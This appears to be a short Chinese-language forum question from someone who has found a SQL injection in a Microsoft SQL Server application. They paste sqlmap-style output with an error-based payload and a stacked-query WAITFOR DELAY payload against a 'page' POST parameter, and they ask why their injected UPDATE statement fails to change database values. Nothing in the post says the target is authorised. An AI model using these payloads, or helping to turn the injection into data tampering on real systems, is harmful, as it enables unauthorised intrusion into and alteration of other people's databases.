SQLi。因此,我使用UPDATE查询来更改数据库值,但是它不起作用。
我试图验证数据库中是否存在触发器,但是不存在触发器。
UPDATE DATABASE.DBO.TABLE SET ID ='AFTER',WHERE ID ='BEFORE'-不起作用。
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload:page=' AND 2889 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (2889=2889) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(98)+CHAR(113)))-- LRXC
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload:page=';WAITFOR DELAY '0:0:5'--
---
有人可以告诉我怎么做吗?